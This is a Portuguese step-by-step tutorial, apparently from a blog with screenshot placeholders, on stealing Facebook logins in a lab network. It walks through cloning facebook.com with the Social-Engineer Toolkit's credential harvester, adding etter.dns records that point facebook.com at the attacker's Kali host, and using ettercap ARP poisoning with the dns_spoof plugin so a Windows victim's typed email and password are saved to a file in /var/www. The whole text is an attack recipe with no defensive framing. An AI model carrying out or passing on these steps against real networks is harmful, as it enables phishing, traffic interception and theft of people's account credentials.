Facebook – ARP Poisoning usando SET e ettercap
Facebook – ARP Poisoning usando SET e ettercap
Passo 01
Abra o aplicativo SET através do menu: Applications > Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit
Digite o número 1 Social-Engineering Attacks ( Ataque de Engenharia Social )
set-tool-01
Passo 02
Digite o número 2 Website Attack Vectors
set-tool-02
Passo 03
Digite o número 3 Credential Harvester Attack Method
set-tool-03
Passo 04
Digite o número 2 Site Cloner
set-tool-04
Passo 05
Digite o IP do atacante host KALI 10.10.10.200
set-tool-05
Passo 06
Digite o endereço do site que deseja clonar no exemplo: https://www,facebook.com ou www.facebook.com
set-tool-06
Passo 07
Durante o processo de captura todos os dados serão armazenados em /var/www
set-tool-07
Passo 08
Edite o arquivo etter.dns para adicionar o novo destino da url www.facebook.com
set-tool-08
Passo 09
Insira as linhas e salve o arquivo
# FACEBOOK
facebook.com A 10.10.10.200
*.facebook.com A 10.10.10.200
www.facebook.com PTR 10.10.10.200
set-tool-09
Passo 10
Certifique-se qual é o Gateway da rede usando o comando route
set-tool-10
Passo 11
Abra o aplicativo ettercap através do menu: Applications > Kali Linux > Sniffing/Spoofing > Network Sniffers > ettercap-graphical
Clique em Sniff > Unified sniffing…
set-tool-11
Passo 12
Selecione a Interface de Rede> eth0
set-tool-12
Passo 13
Clique em Hosts > Scan for hosts
set-tool-13
Passo 14
3 Hosts foram encontrados, clique em Hosts > Hosts list para visualizá-los
set-tool-14
Passo 15
Selecione os hosts Gateway ( 10.10.10.2 ) e WIN-8 ( 10.10.10.146 ) e clique em Add to Target 2
set-tool-15
Passo 16
Clique em Plugins > Manage the plugins
set-tool-16
Passo 17
De um duplo-clique em dns_spoof para ativar o plugin
set-tool-17
Passo 18
Clique em Mitm > Arp poisoning…
set-tool-18
Passo 19
Selecione a opção Sniff remote conections
set-tool-19
Passo 20
O grupo com os hosts é criado, em seguida Clique em Start > Start sniffing
set-tool-20
Passo 21
O sniffing é iniciado.
set-tool-21
Passo 22
No host WIN-8 ( 10.10.10.146 ) acesse o site www.facebook.com e informe o e-mail e senha de acesso.
set-tool-22
Passo 23
Ao explorar o diretório /var/www observe que foram criados 03 arquivos.
harvester_2015_02-17 10:53:37.023687.txt : Arquivo que contem todos os dados capturados como Usuário e Senha
set-tool-23
Passo 24
Basta abrir o arquivo harvester_2015_02-17 10:53:37.023687.txt para visualizar os dados capturados.
set-tool-24